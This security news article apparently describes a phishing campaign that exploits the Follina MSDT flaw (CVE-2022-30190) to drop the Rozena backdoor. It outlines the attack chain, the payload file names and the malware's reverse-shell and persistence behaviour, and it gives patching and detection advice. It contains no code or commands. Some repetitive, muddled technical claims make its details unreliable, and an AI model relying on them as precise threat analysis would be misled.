Phishing Campaign Exploits Follina Vulnerability To Distribute Rozena Backdoor On Windows
This article focuses on a recent phishing campaign that exploits the Follina vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) to distribute the Rozena backdoor malware on Windows systems. The campaign employs various tactics to deceive victims into clicking on malicious links or previewing Microsoft Office documents containing embedded links. Upon exploitation of the vulnerability, the attackers gain complete control over the compromised machine. The attack chain involves the use of weaponized documents, a Discord CDN URL, PowerShell commands, and the download of next-stage payloads. The Rozena malware carries out multiple malicious activities, such as terminating the MSDT process, modifying the Windows Registry for persistence and stealth, downloading a decoy Word document, injecting shellcode, and establishing a reverse shell connection to the attacker’s host. The campaign utilizes different file types, including Word documents, Excel files, Windows shortcuts, and ISO image files, to facilitate the spread of malware. To mitigate this threat, Microsoft has released a patch (CVE-2022-30190), which users are strongly advised to apply promptly.
Key Takeaways
- A phishing campaign has been observed distributing the Rozena backdoor on Windows systems by exploiting the Follina vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT).
- The campaign uses a malicious external link embedded in a Microsoft Office document to trigger the exploit, luring victims into clicking the link or previewing the document.
- The impact of this attack is full control of the affected machine, allowing the threat actors to perform various malicious activities.
- The Rozena malware terminates the MSDT process, modifies the Windows Registry for persistence and stealth, downloads a harmless decoy Word document, injects shellcode into the file, and transmits a reverse shell request to the attacker’s host.
Attack Methodology
The attack methodology of the phishing campaign observed in the pre-existing knowledge involves exploiting the Follina vulnerability to distribute the Rozena backdoor malware on Windows systems. This attack leverages a fileless technique, making it more difficult to detect and mitigate. Prevention measures against fileless attacks should be implemented to mitigate the risk of such attacks. This includes regularly updating software and operating systems, using strong and unique passwords, and employing multi-factor authentication. Additionally, detection and mitigation strategies for remote shell injections should be in place. This can include implementing network segmentation, monitoring network traffic for suspicious activity, and using intrusion detection and prevention systems. Regular security awareness training for users is also crucial to prevent falling victim to phishing campaigns and other social engineering tactics.
Technical Analysis
An examination of the attack chain reveals the utilization of a weaponized document that connects to a Discord CDN URL. This document retrieves an HTML file (index.htm) as part of the attack chain. A PowerShell command is then initiated for diagnostic utility. The next-stage payloads, including the Rozena implant (Word.exe) and batch file (cd.bat), are downloaded from the same CDN attachment space. To detect fileless attacks like Rozena, organizations can employ various techniques such as monitoring for suspicious PowerShell commands and analyzing abnormal network traffic. Additionally, mitigation strategies against the Follina vulnerability include applying the patch released by Microsoft to prevent exploitation. It is crucial for users to promptly apply the patch to mitigate the risk of falling victim to this phishing campaign and to prevent the injection of the Rozena backdoor onto Windows systems.
Malware Activities
One of the tasks of the Rozena malware is to inject shellcode into a harmless decoy Word document. This technique allows the malware to hide its malicious activities and evade detection. By injecting shellcode, the malware gains the ability to execute commands and communicate with a remote server, enabling the attacker to gain control over the affected machine. To better understand the activities of the Rozena malware, the following table provides an overview of its tasks and activities:
| Task/Activity | Description |
|---|---|
| Terminate MSDT process | The malware terminates the Microsoft Windows Support Diagnostic Tool process to prevent detection and analysis. |
| Modify Windows Registry | The malware modifies the Windows Registry to achieve persistence and stealth, ensuring that it can survive system reboots and remain hidden from security tools. |
| Download decoy Word document | The malware downloads a harmless Word document as a decoy to divert attention from its malicious activities. |
| Inject shellcode | The malware injects shellcode, which contains the instructions for the next stage of the attack, into the decoy Word document. |
| Transmit reverse shell request | The malware sends a reverse shell request to the attacker’s host, establishing a communication channel for remote control and data exfiltration. |
In addition to these activities, it is important to note that fileless malware, such as Rozena, poses unique challenges for detection and mitigation. Fileless malware operates by leveraging legitimate processes and tools already present on a system, making it difficult to detect using traditional antivirus solutions. Mitigation strategies for fileless malware include implementing behavior-based detection techniques, monitoring for suspicious activity, and regularly updating security patches to prevent exploitation of vulnerabilities. Furthermore, social engineering plays a significant role in the distribution of malware, as threat actors often rely on deceptive techniques to trick users into clicking on malicious links or opening infected documents. Therefore, user awareness training and caution when interacting with unknown or suspicious content are essential in preventing malware infections.
Exploited Files
Various types of files, including Microsoft Excel, Windows shortcut (LNK), and ISO image files, have been exploited by threat actors to spread malware and deploy malicious payloads on targeted devices. These files serve as droppers to deliver malware such as Emotet, QBot, IcedID, and Bumblebee. The threat actors employ social engineering techniques to exploit the vulnerability and entice victims into opening the malicious files. The phishing campaign leverages the Follina vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) to distribute the Rozena backdoor malware. By embedding a malicious external link in Microsoft Office documents, the attackers trick victims into clicking the link or previewing the document, triggering the exploit. This enables the threat actors to gain full control of the affected machine. It is crucial for users to apply the patch released by Microsoft to prevent the exploitation of the CVE-2022-30190 vulnerability and mitigate the risk of such vulnerability-related attacks.
CVE-2022-30190 Impact
The impact of the CVE-2022-30190 vulnerability includes the facilitation of easy spread of malware through the exploitation of Microsoft Office documents, prompting the release of a patch by Microsoft to address the issue and mitigate the risk of vulnerability-related attacks. This critical vulnerability has allowed threat actors to deliver malware via Word documents, enabling them to gain control of affected machines and potentially cause significant harm. The patch released by Microsoft on June 14, 2022, aims to prevent the exploitation of this vulnerability and protect users from potential attacks. By applying the patch, users can ensure their systems are secure and reduce the risk of falling victim to the Rozena backdoor and other similar threats. Implementing mitigation strategies and staying updated on cybersecurity best practices is crucial for long-term protection against evolving threats.
Frequently Asked Questions
How does the phishing campaign distribute the Rozena backdoor on Windows systems?
The phishing campaign distributing the Rozena backdoor on Windows systems utilizes various techniques employed by threat actors in phishing campaigns. It takes advantage of common vulnerabilities in Windows systems to exploit the Follina vulnerability and deliver the malware.
What files are involved in the attack chain of the Rozena malware?
The Rozena malware infects and manipulates files on Windows systems by injecting shellcode into a harmless decoy Word document. To detect and remove the Rozena backdoor, best practices include using antivirus software and performing regular system scans.
What tasks and activities does the Rozena malware perform once it infects a system?
The Rozena malware performs several tasks and activities once it infects a system. These include terminating the MSDT process, modifying the Windows Registry for persistence and stealth, downloading a harmless decoy Word document, injecting shellcode into the file, and transmitting a reverse shell request to the attacker’s host. Detection and prevention techniques for Rozena backdoor involve behavioral analysis of the malware and the application of security measures such as patching vulnerabilities and employing endpoint protection solutions.
Which types of files are exploited by threat actors to spread malware?
Threat actors exploit common file types, such as Microsoft Excel, Windows shortcut (LNK), and ISO image files, to spread malware. These exploitation techniques are employed as part of phishing campaigns to deliver malicious payloads and infect victims‘ devices.
What is the impact of the CVE-2022-30190 vulnerability and how can it be mitigated?
The impact of the CVE-2022-30190 vulnerability is significant, as it allows for the easy spread of malware via Word documents. To mitigate this vulnerability, users should apply the patch released by Microsoft on June 14, 2022. Applying the patch helps prevent exploitation and is an important step in preventing vulnerability-related attacks.
